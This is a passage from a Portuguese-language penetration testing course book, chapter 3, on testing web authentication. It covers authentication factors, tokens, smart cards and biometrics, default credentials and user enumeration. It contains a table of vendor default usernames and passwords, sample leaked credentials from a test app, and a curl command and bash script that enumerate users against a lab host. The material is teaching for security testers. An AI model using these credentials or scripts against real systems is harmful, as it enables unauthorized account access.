1 SCARFONE, Karen; SOUPPAYA, Murugiah; CODY, Amanda e OREBAUGH, Angela.

Technical Guide to Information Security Testing and Assessment Recommendations
of the National Institute of Standards and Technology. NIST Special Publication 800-115,
National Institute of Standards and Technology, 2008.
1 STATCOUNTER. Top 5 browsers from Nov 09 to Nov 10. Disponvel em:

http://gs.statcounter.com/. Data de acesso: 28/12/2010.
1 STATOWL. Web browser market share. Disponvel em: http://www.statowl.com/web_

browser_market_share.php. Data de acesso: 28/12/2010.
1 STUTTARD, Dafydd; PINTO, Marcus. The Web Application Hackers Handbook. Wiley
Captulo 2 - Bibliografia 2
85
86
3
Teste do mecanismo de autenticao
objetivos
Apresentar as principais vulnerabilidades s quais esto sujeitos os mecanismos

de autenticao de usurios, bem como as tcnicas que podem ser empregadas
para detect-las e explor-las.
conceitos
Fatores e tecnologias de autenticao, enumerao de usurios, autenticao com
mltiplos fatores, ataques de fora bruta, ataques de dicionrio, rainbow tables,
poltica de senhas fortes.
Introduo
Um requisito importante de segurana da informao, que deve ser satisfeito por apli- q
caes web, a autenticao de entidades, isto , a corroborao da identidade da parte
com a qual se comunica.
Por um lado, os usurios querem ter a certeza de que esto conectados com o servidor
legtimo antes de fornecerem informaes sensveis, como credenciais de acesso e docu-
mentos de projeto. Por outro, a aplicao necessita confirmar a identidade de cada usurio,
para que acessos a regies protegidas sejam devidamente autorizados. O primeiro caso
resolvido, normalmente, por meio do uso do protocolo HTTPS, cujas vulnerabilidades de
implantao so discutidas no Captulo 9. J a autenticao de usurios ser abordada, ao
longo deste captulo, com foco nos problemas de segurana que podem ocorrer.
Um processo de autenticao de entidades sempre envolve a interao entre duas q Captulo 3 - Teste do mecanismo de autenticao
partes, o reclamante e o verificador, que visam, respectivamente, comprovar a prpria

identidade e averiguar as provas fornecidas pelo primeiro. Nesse contexto, o reclamante
pode utilizar um ou mais fatores abaixo para provar o que deseja:
1 Algo que se sabe: para provar a identidade, o reclamante mostra conhecimento de

uma informao sabida apenas por ele, como senhas e chaves privadas. Esse o fator
mais utilizado para autenticao de usurios em aplicaes web.
1 Algo que se tem: o reclamante deve provar que possui um dispositivo fsico parti-
cular, fornecido ou cadastrado anteriormente pelo verificador. Cartelas de senhas,
celulares, smart cards e geradores de senhas nicas so exemplos de tais disposi-
tivos, os quais so comumente empregados em cenrios que requerem um alto nvel
de segurana, como internet banking e declarao de Imposto de Renda.
87
1 Algo que se : nesse caso, uma pessoa prova a identidade por meio de uma caracte- q
rstica fsica ou comportamental (biometria), como ris, voz, retina, impresso digital,
face, padro de digitao, assinatura manual, entre outros. Embora seja possvel utilizar
esse fator em aplicaes web, no muito comum encontr-lo na prtica, pois o custo
dos sensores pode ser elevado e o processo de cadastro de usurios no trivial.
Quando mais de um fator empregado no processo de autenticao, diz-se que ele

multifator, e, de modo geral, isso confere um nvel de segurana superior a solues que se
baseiam em uma nica classe de mecanismo. Uma exceo, porm, engloba aqueles sis-
temas que permitem que o usurio se autentique com apenas um dos fatores contemplados
e, consequentemente, a segurana equivalente ao mecanismo mais fraco do conjunto.
No caso especfico de biometria, possvel utilizar mais de uma caracterstica fsica ou

comportamental do usurio, para autentic-lo, o que chamado de autenticao bio-
mtrica multimodal. Pode-se dizer que a autenticao de usurios o mecanismo de segu-
rana mais evidente para aqueles que utilizam uma aplicao, pois ele completamente
explcito e obrigatrio.
Quando apresenta falhas, porm, um atacante consegue acesso ilegtimo ao sistema, seja
pela porta da frente, por meio do fornecimento de credenciais vlidas, maliciosamente
obtidas, ou pela lateral, evadindo ou subvertendo a implementao do mecanismo. Em
qualquer dos casos, informaes sensveis da vtima podem ser comprometidas e aes,
realizadas em nome dela. Obviamente, o problema torna-se muito mais crtico caso a conta
violada tenha privilgios administrativos (Meucci et al., 2008; Stuttard e Pinto, 2007).
Este captulo tem por objetivo apresentar as diversas vulnerabilidades que, comumente,
afetam os mecanismos de autenticao de entidades. Com isso em mente, os seguintes
tpicos so cobertos: tecnologias de autenticao, uso de informaes obtidas nas fases de
reconhecimento e de mapeamento, credenciais padronizadas, enumerao de identifica-
dores de usurio, mecanismo vulnervel de recuperao de senhas, funcionalidade lembrar
usurio, transporte inseguro de credenciais, falhas na implementao do mecanismo, troca
de senhas vulnervel, ataque de fora bruta, ataque de dicionrio, ataque contra senhas
armazenadas, polticas de senhas fortes e engenharia social.
Autenticao de usurio
Que fatores podem ser utilizados na autenticao de um usurio?
Autenticao de entidades
O que se entende por autenticao de entidades?
Que tecnologias de autenticao voc encontra nas aplicaes web que utiliza?
88
Tecnologias de autenticao empregadas em aplicaes web
O mecanismo de autenticao de usurios mais comumente empregado por aplicaes q
web consiste no fornecimento de identificador e senha, cuja correo deve ser verificada
pela aplicao contra uma base de contas cadastradas. Essa abordagem pode ser imple-
mentada por meio das seguintes tecnologias:
1 Autenticao HTTP: baseia-se nos mtodos Basic e Digest, nativos do protocolo HTTP,
que solicitam as credenciais por meio de uma caixa de dilogo exibida ao usurio pelo
navegador web. No muito utilizada em aplicaes acessveis pela internet, salvo em
alguns sistemas de correio eletrnico corporativo. Possui a desvantagem de no permitir
travamento de conta, aps mltiplas tentativas invlidas e sucessivas de autenticao.
1 Autenticao integrada ao Windows: antigamente, conhecida por autenticao

NTLM NTLM ou NT LAN Manager um mtodo suportado pelos produtos da Microsoft, que
Antiga sute de utiliza Kerberos ou NTLM no processo de autenticao de usurios. Diferentemente da
protocolos de autenticao HTTP, primeiro tenta utilizar as informaes de conta Windows presentes
segurana, desenvolvida
pela Microsoft para uso no cliente, antes de solicitar as credenciais para o usurio. Como no capaz de traba-
em redes Windows, com lhar em conexes com proxy, nunca empregada em aplicaes web na internet.
o objetivo de prover
autenticao, sigilo e 1 Autenticao por formulrios: segundo Stuttard e Pinto (2007), essa tecnologia
integridade. Como no usada por mais de 90% dos sistemas na internet, devido flexibilidade e facilidade
suporta algoritmos de personalizao que apresenta. A captura de credenciais ocorre em um formulrio
criptogrficos
modernos, no deve em HTML e a verificao efetuada no lado do servidor. Polticas de senhas fortes
ser empregada em e controles adicionais de segurana podem ser desenvolvidos da maneira que se
novas implementaes, queira, bastando que sejam codificadas pela aplicao ou suportadas pelo arcabouo
segundo recomendao
do prprio fornecedor. de autenticao empregado.
Atualmente, comum que uma nica pessoa tenha contas em dezenas de sites web, que
vo de aplicaes de correio eletrnico a sistemas de internet banking. Uma prtica de
segurana importante que sejam utilizadas senhas diferentes e fortes para cada uma das
contas, mas isso dificulta que o usurio memorize todas elas. Para resolver esse problema,
os navegadores web modernos e sutes de proteo de computadores pessoais apresentam
l funcionalidades para armazenamento seguro de senhas, por meio de uma senha mestra.
Embora alguns riscos de segurana pairem sobre essas solues, ainda uma abordagem
Saiba mais
muito melhor que a escrita das senhas em um pedao de papel ou o armazenamento em
Kerberos um proto- arquivo no cifrado.
q
colo de autenticao
de entidades, para Outro problema decorrente das solues baseadas em senhas que elas podem ser
aplicaes cliente/ser-
capturadas por software malicioso (keylogger) enquanto so digitadas em mquinas
vidor, criado pelo Mas- Captulo 3 - Teste do mecanismo de autenticao
sachusetts Institute of infectadas. Isso levou muitas empresas a adotarem teclados virtuais, como o ilustrado
Technology (MIT). Uti- na Figura 3.1(a), que permitem que o usurio clique nos caracteres que compem a
liza uma terceira parte
senha escolhida, anulando a ameaa de interceptao. A resposta criminosa foi a criao
confivel e criptografia
simtrica, para corro- de screenloggers, capazes de gravar regies da tela ao redor do ponto clicado com o
borar as identidades mouse, bem como as coordenadas dessa posio. Um novo avano foi necessrio e,
das partes envolvidas
hoje, alguns teclados virtuais permutam as posies dos elementos, aleatoriamente,
e, ao mesmo tempo,
estabelecer uma chave, antes de apresent-los, e escondem o smbolo de uma tecla, quando o mouse passa por
para proteo do canal cima dela vide Figura 3.1(b).
de comunicao.
Aplicaes de internet banking e sistemas que requerem um alto grau de segurana
adotam, frequentemente, tokens como um segundo fator de autenticao.
A forma mais simples consiste em uma cartela contendo cerca de cinquenta senhas de
quatro dgitos geradas aleatoriamente para cada usurio e numeradas sequencialmente
89
vide Figura 3.2(a). Quando uma transao crtica, como transferncia de fundos, requisi-
tada, a aplicao solicita que uma senha especfica da cartela e a senha geral sejam
fornecidas. Se o usurio no possui a cartela correta, a chance de acerto de uma em dez
mil possibilidades, o que razoavelmente seguro, quando o travamento de contas
utilizado. O problema, porm, reside no fato de que adivinhao de senhas no o caminho
adotado pelos criminosos. O que normalmente eles fazem induzir o usurio, por meio de
engenharia social, a acessar uma pgina falsificada e fornecer todas as posies da tabela,
sob pretexto de um problema ter ocorrido na base da aplicao. Infelizmente, ainda hoje,
muitas pessoas so susceptveis a esse tipo de ataque!
Figura 3.1
Teclados virtuais: (a)
Tradicional. (b) Com
proteo contra
screenlogger.
(a) (b)
Considerando o ataque acima, uma tecnologia mais eficaz, porm mais custosa, compre- q
ende dispositivos de gerao de senhas dinmicas, as quais podem ser usadas apenas
uma nica vez pelo usurio. Desse modo, a captura delas torna-se uma ameaa irrele-
vante, pois no possvel reutiliz-las para autenticao, por serem descartveis.
Porm, como em toda soluo baseada em token, um problema surge quando a pessoa
perde ou danifica o equipamento, porque ela ser impedida de utilizar a aplicao, at
que aquele seja substitudo. De modo geral, esses dispositivos apresentam um visor de
LCD (Figura 3.2(b)), no qual a senha exibida, e, eventualmente, um teclado numrico para
entrada de senha pessoal e desafios. Para que o usurio possa ser validado corretamente,
os tokens precisam estar sincronizados com o servidor de autenticao da aplicao, o que
realizado de acordo com a classe a que pertencem (Harris, 2008):
1 Sncronos: a senha gerada a partir de uma semente secreta e individualizada e

de uma informao, como o horrio ou um contador, as quais so compartilhadas
entre o servidor de autenticao e o dispositivo. No primeiro caso, a senha alterada
depois de transcorrido um intervalo de tempo pr-determinado, enquanto que, no
segundo, o usurio precisa apertar um boto para avanar para o prximo valor.
1 Assncronos: essa classe de dispositivos baseada no seguinte protocolo de

desafio-resposta: o servidor de autenticao gera um nmero aleatrio, que
exibido ao usurio pela aplicao. Este digita o valor no token, juntamente com
a senha pessoal, e a senha resultante calculada e exibida no visor de LCD. Para
encerrar a autenticao, o valor correto deve ser fornecido aplicao, que com-
pleta a operao solicitada, somente caso a validao seja realizada com sucesso.
Outra soluo interessante envolvendo tokens consiste no envio, quando necessrio, de

informaes de autenticao ao aparelho celular cadastrado para o usurio.
Por exemplo, ao receber uma requisio de operao crtica, a aplicao gera um nmero
aleatrio de confirmao e o envia, por meio de SMS, ao telefone do cliente, que deve digit-lo
em campo especfico do sistema. Para atacar uma soluo assim, necessrio, alm de
obter as credenciais vlidas de um usurio, adivinhar o valor de confirmao gerado pelo
90
servidor ou ter acesso ao celular da vtima. Um problema dessa tecnologia, porm, que
no h garantia de entrega de mensagens SMS, o que pode impedir a concretizao de uma
transao, se o valor de confirmao no for recebido a tempo.
Figura 3.2
Tokens: (a) Cartela
de senhas. (b)
Dispositivo sncrono
de senhas dinmicas
baseado em horrio.
(a) (b)
Embora solues baseadas em smart cards e tokens criptogrficos estejam disponveis h

um bom tempo (Hamman et al., 2001), no fcil encontrar aplicaes web que as utilizem,
devido ao alto custo de implantao e dificuldade de operacionalizao. Apesar disso, h um
exemplo de uso dessas tecnologias no cenrio brasileiro, o site da Receita Federal, que
permite realizar a autenticao do usurio por meio do e-CPF (vide Figura 3.3).
Captulo 3 - Teste do mecanismo de autenticao
q
Figura 3.3
Aplicao da O princpio bsico da autenticao por token criptogrfico consiste no protocolo de
Receita Federal,
que permite acesso desafio-resposta ilustrado, de maneira simplificada, na Figura 3.4:
via e-CPF. 1. O usurio solicita aplicao a realizao de uma operao crtica.
2. Como resposta, o servidor envia um nmero aleatrio (desafio) ao cliente, que deve
ser assinado digitalmente com a chave privada contida no token.
3. O lado cliente da aplicao solicita ao usurio a senha do smart card.
4. Usurio fornece aplicao a senha de acesso ao smart card.
5. A senha enviada ao smart card, para autenticao do usurio.
91
6. A aplicao cliente fornece o desafio para o smart card, para gerao de assinatura. q
7. O smart card assina o desafio e o devolve aplicao cliente.
8. O desafio assinado enviado ao servidor, para verificao por meio da chave pblica
cadastrada do usurio. Caso uma resposta positiva seja obtida, possvel corroborar
a identidade do usurio, pois somente ele, que detm o smart card e conhece a senha
de acesso, capaz de gerar uma assinatura digital vlida.
Usurio
(3) Solicita
(4) Senha
senha
(5) Senha (1) Operao crtica
(6) Desao (2) Desao
(7) Desao assinado (8) Desao assinado
Smart card Aplicao - lado cliente Aplicao - lado servidor
Alternativamente, possvel calcular um MAC sobre o desafio, em vez de uma assinatura Figura 3.4
digital, empregando uma chave simtrica armazenada no dispositivo criptogrfico e compar- Autenticao
de usurio com
tilhada com a aplicao. Qual dos mecanismos escolher depende do tipo de smart card utili- smart card.
zado, que pode suportar apenas criptografia simtrica ou, tambm, algoritmos assimtricos.
Conforme visto, uma ameaa contra sistemas baseados em senhas consiste na captura
destas por meio de softwares maliciosos instalados na mquina do usurio. Embora isso
tambm possa acontecer no caso das senhas de acesso s chaves criptogrficas, como
elas nunca deixam o dispositivo criptogrfico, preciso roub-lo, para executar um ataque
efetivo contra a aplicao. Outro cenrio hipottico, mas factvel se o token fica conectado
ao ambiente o tempo inteiro, utilizar o prprio malware que captura a senha para rea-
lizar transaes fraudulentas em nome da vtima. Nesse caso, o dispositivo criptogrfico
tratado como um orculo, que responde a todas as perguntas que lhe so direcionadas.
Outro mtodo possvel de corroborar a identidade do usurio, porm, pouco presente q

em aplicaes web, emprega o prprio protocolo SSL/TLS, que permite autenticao
mtua de entidades. Isso requer que um certificado digital de usurio e a chave privada
correspondente, normalmente, em formato Public-Key Cryptography Standards #12
(PCKS #12), sejam inseridos no navegador web. PKCS #12
Padro criado pelo
Quando o usurio acessar uma aplicao que requeira o uso de certificado de cliente, o RSA Laboratories, para
navegador abre uma janela solicitando que um par de chaves seja escolhido (vide Figura o armazenamento e
transferncia seguros de
3.5). Caso o servidor consiga validar o certificado apresentado, a negociao SSL/TLS com-
chaves privadas e outras
pletada com sucesso, e acesso a regies protegidas da aplicao concedido ao usurio. informaes sigilosas
de identificao.
As seguintes dificuldades, pelo menos, podem ser enumeradas para a autenticao de
usurio baseada no protocolo SSL/TLS:
1 Dificuldade de implantao: cada usurio da aplicao precisa obter um certificado de

uma autoridade certificadora vlida ou ento a entidade dona da aplicao necessita
criar e manter infraestrutura de chaves pblicas prpria. Qualquer uma das abordagens
gera um custo financeiro e/ou operacional, que, muitas vezes, pode ser proibitivo.
92
1 Proteo da chave privada de usurio: de modo geral, os navegadores web somente
pedem a senha do arquivo PKCS #12, contendo a chave privada, no momento de impor-
tao. Aps isso, qualquer pessoa que tenha acesso mquina capaz de se autenticar
na aplicao, selecionando o par de chaves adequado.
1 Controle de acesso: os privilgios de acesso so concedidos com base em configuraes

no servidor web, que especifica os recursos da aplicao que cada usurio pode acessar,
de acordo com o nome contido no certificado. Fica claro que gerenciar os privilgios em
um ambiente assim no nada prtico, pois cada alterao requer que o servidor seja
reiniciado, para que as novas configuraes tornem-se ativas.
Figura 3.5
Tela do Firefox
solicitando escolha
de certificado
para acesso apli-
cao web.
A ltima tecnologia de autenticao a ser abordada a baseada em biometria, cujas q

vertentes mais simples de serem utilizadas em ambientes genricos so as de reconheci-
mento de face e de locutor.
A razo disso que, atualmente, a grande maioria de computadores pessoais e portteis

possui cmera e microfone instalados, descartando a necessidade de se adquirir equi-
pamento caro e especializado. Esse tipo de soluo requer, como no caso de dispositivos
criptogrficos, que um mdulo no lado cliente, escrito em Java ou ActiveX, por exemplo,
seja carregado e executado pelo navegador web, para controle do dispositivo de captura de
dados biomtricos.
Diversos fatores impedem uma adoo em massa de biometria:
1 O processo de registro de usurio no simples e requer que diversas amostras sejam

coletadas em dois tipos de ambiente: naturais e controlados. Para aplicaes web de pro-
psito geral, isso extremamente complicado de ser realizado, pois o usurio se registra
a partir do prprio computador pessoal, sem interagir fisicamente com a empresa que
oferece o servio.
1 Mtodos biomtricos precisam ser regulados para balancear as taxas de falsos positivos
e falsos negativos. Este ltimo mede a proporo de usurios vlidos que no so auten-
ticados pelo sistema, enquanto que o primeiro avalia a taxa de pessoas, eventualmente
atacantes, que so incorretamente autenticadas como outras.
93
1 Diversos mtodos de ataque foram descritos na literatura para comprometer autenti-
cao biomtrica (Duc e Mihn, 2009; Uludag e Jain, 2004) e as principais estratgias de
mitigao requerem o uso de tecnologia especial ou ferem a usabilidade do sistema.
Vulnerabilidades
Que tipos de vulnerabilidades podem ser encontrados em mecanismos de autenticao?

Um exemplo de vulnerabilidade em mecanismos de autenticao, que afeta diversas q
aplicaes web, consiste na submisso de credenciais de acesso, por meio do protocolo
HTTP, o qual no protege a confidencialidade do canal.
Consequentemente, essas informaes podem ser facilmente capturadas, no caminho

at o servidor, e utilizadas por um atacante para autenticar-se no sistema. Para ratificar
esta constatao, considere-se que, at bem pouco tempo atrs, diversos stios de correio
eletrnico funcionavam dessa maneira. Felizmente, isso melhorou muito, hoje em dia, mas
so poucos os que protegem a sesso inteira por meio do protocolo HTTPS, deixando, ainda,
uma brecha para ataques de sequestro de sesso.
Outra tcnica que pode ser empregada para quebrar o mecanismo de autenticao o q
ataque por fora bruta, que consiste em testar todas as senhas possveis para um con-
junto de identificadores de usurio.
O ponto de partida depende da enumerao de alguns usurios da aplicao, o que pode

ser facilitado pelo uso de identificadores previsveis, contas pr-instaladas ou mensagens
de erro detalhadas. Adicionalmente, para o sucesso da explorao, a aplicao precisa ser
incapaz de travar contas, aps mltiplas tentativas invlidas e sucessivas de autenticao,
alm de no implementar uma poltica de senhas fortes.
Cuidados devem ser tomados para evitar que o mecanismo de autenticao seja q
evadido. Um deslize comum, nesse sentido, criar uma pgina de autenticao que,
em caso de sucesso, redireciona o usurio para reas protegidas da aplicao, mas sem
impedir o acesso direto a essas pginas.
Nessa mesma linha, algumas aplicaes podem ser enganadas pela simples manipulao
de parmetros. Por exemplo, um atacante pode, simplesmente, trocar o valor de um campo
escondido, que indica se um usurio est autenticado, de no para sim. Ademais, se o
trecho de cdigo que trata a autenticao contiver erros lgicos, muito provavelmente no
sero necessrias credenciais vlidas para acesso aplicao.
Mecanismos de recuperao e troca de senhas podem, muitas vezes, ser um caminho q

para acesso no autorizado aplicao.
Alguns erros que devem ser evitados no primeiro caso compreendem: utilizao de per-
guntas secretas com respostas fceis de serem adivinhadas; inexistncia de mecanismo de
travamento por tentativas invlidas; e exibio da senha atual, caso o usurio responda cor-
retamente s perguntas secretas. J com relao troca de senhas, ataques so possveis
quando a senha antiga no solicitada, antes da realizao da operao.
94
Para finalizar, importante mencionar que o principal problema com a autenticao de q
usurio no de origem tcnica, mas sim de natureza humana.
Para pensar
As pessoas tendem a escolher senhas fceis de serem memorizadas, que so facil-

mente adivinhadas por terceiros. Quando o sistema verifica a qualidade das senhas,
os usurios criam um arquivo em claro para armazen-las ou penduram um pedao
de papel no monitor com o valor escolhido. Se cartes de senha so empregados,
basta enviar uma mensagem de correio eletrnico, dizendo que houve um problema
no sistema e que a cartela inteira precisa ser fornecida pelo usurio, para se ter
acesso a todos os valores.
Uso de informaes obtidas nas fases de reconhecimento e mapeamento

Conforme visto no Captulo 2, diversas informaes interessantes podem ser obtidas q
nas fases de mapeamento e de reconhecimento de aplicaes web. Em alguns casos, so
descobertos identificadores vlidos de usurios, que servem de ponto de partida para um
ataque de fora bruta contra o mecanismo de autenticao ou para quebra da funcio-
nalidade de recuperao de senhas. Em outros cenrios mais favorveis, as informaes
permitem acesso direto s reas protegidas do sistema, o que pode ser muito til, quando
so realizados testes caixa-preta, nos quais, contas vlidas de usurio no so fornecidas.
Por exemplo, observe-se o contedo do arquivo accounts.txt, abaixo ilustrado, que pode ser
encontrado no processo de reconhecimento da aplicao de teste Mutillidae. Tudo indica
que as informaes exibidas so credenciais de acesso aplicao. Assim, basta test-las,
uma a uma, e verificar se possvel autenticar-se como um usurio vlido, conforme
ilustrado na Figura 3.7. As vantagens dessa situao residem no tempo economizado para
obteno de acesso s reas protegidas do sistema e o no disparo de alertas por eventuais
mecanismos de deteco de intruso que estejam instalados no ambiente.
admin, adminpass, Monkey!!!
adrian, somepassword, Zombie Films Rock!!!
Figura 3.6 john, monkey, I like the smell of confunk Captulo 3 - Teste do mecanismo de autenticao
Contedo do arqui-
vo accounts.txt. ed, pentest, Commandline KungFu anyone?
95
Outra fonte de credenciais vlidas, descobertas no mapeamento da aplicao, so q Figura 3.7
Autenticao na
comentrios deixados pelos programadores, no cdigo HTML apresentado ao usurio, aplicao com da-
conforme ilustrado na Figura 3.8. dos obtidos na fase
de reconhecimento.
Isso acontece, muitas vezes, quando alguma funcionalidade ainda no est finalizada e os
desenvolvedores deixam um lembrete contendo identificador e senha de teste, para uso
prprio, o qual no removido do cdigo, por esquecimento, antes da liberao do sistema
para produo. Note-se que para essa vulnerabilidade poder ser explorada, contas de teste
devem estar presentes no ambiente final da aplicao, o que configura um problema de
segurana adicional.
Obviamente, descobrir credenciais vlidas logo no incio do teste de invaso representa q

o cenrio ideal, mas nem sempre ele pode ser alcanado. Assim, deve-se ter em mente
que outras informaes, como identificadores de usurios, podem ser igualmente teis,
empregando-se outras tcnicas de invaso. Portanto, uma lista deve ser compilada, a
partir dos identificadores encontrados, em fontes pblicas, como redes sociais e listas
de discusso, durante a etapa de reconhecimento.
Figura 3.8
Credenciais conti-
das em comentrio
no cdigo HTML.
96
Usurio e senha padronizados
Sistemas e plataformas, normalmente, so distribudos com algumas contas padronizadas, q
cujas senhas so conhecidas publicamente. Caso aquelas no sejam desativadas ou as
senhas no sejam alteradas, um atacante pode, muito facilmente, obter acesso no autori-
zado ao sistema, bastando para isso consultar a documentao do fornecedor ou a internet.
Mesmo quando o administrador tem preocupao em definir uma nova senha, comum
que valores simples sejam escolhidos, como pass123, por exemplo. Por esses motivos,
essa verificao deve sempre ser efetuada em um teste de invaso, para todos os elementos
mapeados, pois pode trazer excelentes resultados, com o mnimo de esforo.
Em sistemas desenvolvidos para o uso interno de uma empresa, normal encontrar q

contas previsveis como admin, administrator, root, system, test, teste, test123
e guest. As senhas, por sua vez, costumam ser vazias, iguais aos prprios identifica-
dores ou palavras comuns, como password, pass123 e senha (Meucci et al., 2008).
Alm disso, essas contas, normalmente, possuem privilgios administrativos sobre a apli-
cao, resultando em maior impacto, quando exploradas. Ainda nesse escopo, contas de
novos usurios, muitas vezes, so definidas com senhas padronizadas ou baseadas em uma
regra de formao, dependente do identificador de usurio. Isso cria uma janela de oportu-
nidade para ataques, que perdura at que o novo colaborador substitua a senha inicial.
Para concluir esta seo, a Figura 3.9 lista credenciais conhecidas para alguns sistemas web
e plataformas subjacentes encontrados comumente em sistemas de produo.
Plataforma/Sistema Verses Usurio Senha
Apache Tomcat Diversas admin admin
Apache Tomcat Diversas admin tomcat
Apache Tomcat Diversas tomcat tomcat
BEA Weblogic 5.1 system weblogic
IBM WebSphere Application Server Community Edition system manager
Microsoft SQL Server 2000, 2005 sa -
MySQL Todas root -
Oracle Database Diversas scott tiger Captulo 3 - Teste do mecanismo de autenticao
Oracle Database 7, 8i sys change_on_install
Oracle Database < 10 system manager
phpMyAdmin Todas root -
Pligg CMS god 12345

Figura 3.9
Exemplos de Red Hat JBoss 4 admin admin
conta e senha
padronizadas. SonicWALL Todas admin password
97
Enumerao de identificadores de usurios
Mesmo quando as informaes levantadas durante as fases de reconhecimento e q
mapeamento so suficientes para viabilizar acesso a regies protegidas da aplicao,
importante ter disposio um conjunto de identificadores vlidos de usurios, para se
testar outras potenciais vulnerabilidades.
Vimos, anteriormente, que algumas vezes possvel obt-los diretamente em fontes

pblicas de informao, mas quando isso no acontece, eles devem ser coletados em um
processo denominado de enumerao de usurios.
Uma vulnerabilidade na aplicao, que pode ser explorada para esse propsito, consiste q
em se exibir ao usurio mensagens de erro muito especficas, quando a autenticao
no realizada com sucesso.
Observando o exemplo da Figura 3.10, percebe-se que a aplicao indica se o motivo do

problema foi o fornecimento de um identificador inexistente ou de uma senha invlida.
No ltimo caso, logicamente, pode-se concluir que a conta informada foi reconhecida pelo
sistema, se no, a outra mensagem teria sido apresentada.
Desse modo, para enumerar usurios, basta tentar se autenticar no sistema, com uma q
srie de possveis identificadores, e observar as mensagens de erro exibidas.
Figura 3.10
Mensagens de erro
no uniformes em
caso de tentativa
malsucedida de
autenticao:
(a) Usurio existe,
mas senha informa-
da incorreta. (b)
(a) (b) Usurio no existe.
Como um mecanismo de travamento de conta por tentativas malsucedidas de autenticao

pode estar habilitado, razovel realizar o teste com uma senha plausvel, para no desper-
diar uma das chances disponveis. Estratgias eficazes incluem repetir o prprio identi-
ficador de usurio ou fornecer uma das senhas comuns, enumeradas na seo anterior
(Stuttard e Pinto, 2007).
Note que a chave para o sucesso da tcnica depende de conseguir discernir a situao em q
que a conta invlida daquela em que ela existe, mas a senha informada no a esperada.
Assim, mesmo que as mensagens de erro para os dois casos paream idnticas, deve-se
analis-las detalhadamente, em busca de diferenas sutis que possam existir (Stuttard
e Pinto, 2007; Meucci et al., 2008). Abaixo esto exemplos de caractersticas que podem
variar e no serem visualmente perceptveis:
1 Cdigo HTML: as mensagens de erro podem ser visualmente iguais, mas com dife-
renas no cdigo HTML. Por exemplo, cada pgina pode conter um campo escondido
de cdigo de erro, definido com valor especfico.
1 Ttulo da pgina: corpos das mensagens idnticos, mas com ttulos diferentes indi-
cando cada uma das situaes.
98
1 Tempo de resposta: a aplicao pode gastar mais tempo para exibir uma mensagem q
de erro, quando o identificador existe e a senha incorreta, porque ela precisa
ser transformada e comparada com o valor na base de usurios. Embora isso seja,
normalmente, imperceptvel para um ser humano, uma ferramenta automatizada
capaz de detectar e apontar tal variao no tempo de processamento.
1 Cabealhos da resposta: presena de cabealhos personalizados, que variam de

acordo com o erro ocorrido.
Em um teste de invaso real, fundamental recorrer automatizao, pois um grande

nmero de identificadores de usurio verificado.
O seguinte exemplo ilustra uma maneira de realizar o trabalho empregando o utilitrio curl,
que permite transferir dados por meio de diversos protocolos, inclusive o HTTP. O primeiro
passo consiste em identificar a URL do programa que processa a autenticao e os nomes dos
parmetros enviados. Essas informaes podem ser obtidas interceptando a requisio ou a
partir do cdigo-fonte do formulrio de autenticao, conforme ilustrado na Figura 3.11.
Figura 3.11 A sintaxe do utilitrio curl, para submeter o formulrio com os parmetros identificados, e a
Cdigo-fonte de sada da execuo esto abaixo ilustrados:
formulrio de
autenticao. ~$ curl -s --data userid=admin&senha=admin&Submit1=Login 8
http://form-auth.esr.rnp.br/login.php
<table width=380 border=0 cellpadding=0 cellspacing=1

bgcolor=#424271><tr><td><img src=esr-70f.gif/></td></
tr></table><table width=380 border=1 cellpadding=0
cellspacing=1><tr><td align=center><b>admin, seja bem-vindo!</
b></td></tr></table><table width=380 border=1 cellpadding=0
cellspacing=1><tr><td><br/><a href=http://form-auth.esr.rnp.br/
checkbalance.php?auth=Y&uid=admin>Consultar saldo</a><br/><br/><a
href=http://form-auth.esr.rnp.br>Encerrar sessão</
a><br/><br/></td></tr></table>
99
Pelo HTML retornado, possvel observar que as credenciais admin/admin so vlidas e que
os textos marcados em vermelho podem ser empregados para identificar uma autenticao
bem-sucedida. Considerando essa informao e tambm que a aplicao exibe as mensa-
gens de erro ilustradas na Figura 3.10, um script para enumerao de usurios est apre-
sentado na Figura 3.12. Esse script obtm a lista de identificadores a partir do arquivo texto
ids, que contm um item por linha e tenta se autenticar usando o mesmo valor para usurio
e senha. Se as credenciais so validadas, um par (id, id) exibido; se no, se a mensagem
de senha incorreta recebida, exibe-se um par (id, ?), indicando conta existente e senha
desconhecida. Nesse caso, importante lembrar que uma das tentativas permitidas foi
consumida antes do bloqueio da conta.
#!/bin/bash
for id in $(cat ids)
do
resp=$(curl -s --data userid=$id&senha=$id&Submit1=Login \
http://form-auth.esr.rnp.br/login.php)
if [ $(echo $resp | grep -c senha incorreta) -ne 0 ];
then
echo ($id, ?)
elif [ $(echo $resp | grep -c bem-vindo) -ne 0 ];
then
echo ($id ,$id)
fi Figura 3.12
Script para enume-
done rao de usurios.
Algumas aplicaes web evitam o ataque de enumerao de identificadores de usurios q

na tela de autenticao, exibindo uma mensagem uniforme de erro, quando as creden-
ciais fornecidas no so vlidas.
Apesar disso, o controle no adotado nas demais funcionalidades do sistema, como, por
exemplo, o mecanismo de recuperao de senhas. Consequentemente, o problema, que est ilus-
trado na Figura 3.13, pode ser explorado empregando a mesma tcnica descrita anteriormente.
Figura 3.13
Mecanismo vulner-
vel de recuperao
de senhas, que pos-
sibilita enumerao
de usurios: (a) Tela
exibida, quando
identificador existe.
(b) Mensagem de
erro informando
inexistncia de
(a) (b) identificador.
100
Aplicaes que permitem a criao da prpria conta de acesso, em sua grande maioria, q
no tratam a fraqueza em questo durante o processo de cadastro. Quando um identifi-
cador j existente fornecido, a aplicao informa o fato ao usurio, revelando, colate-
ralmente, a validade da conta, sem o risco de bloque-la. Nesse caso, entretanto, no
fcil corrigir a vulnerabilidade e, por isso, o risco tende a ser assumido.
A dificuldade de soluo reside nas opes disponveis para lidar com o problema:
1 Uma abordagem consiste em delegar a gerao de identificadores aplicao, mas, para

que o controle seja efetivo, eles precisam ser imprevisveis, dificultando a memorizao
por parte do usurio. Observe que, se esse requisito no for satisfeito, a enumerao de
usurios torna-se trivial.
1 Outra possibilidade utilizar endereos de correio eletrnico como contas de usurio,

os quais devem ser informados durante o registro (Stuttard e Pinto, 2007). Uma noti-
ficao enviada ao endereo informado, se a conta existir, ou, caso contrrio, uma
mensagem contendo um link para uma pgina temporria de finalizao do processo.
Mas o que fazer se a conta que se deseja criar for justamente a primeira conta de correio
eletrnico do usurio?
Mecanismo vulnervel de recuperao de senhas

Aplicaes web desenvolvidas para a internet, que permitem que os usurios criem suas q
prprias contas, normalmente, possuem uma funcionalidade para auxili-los em casos
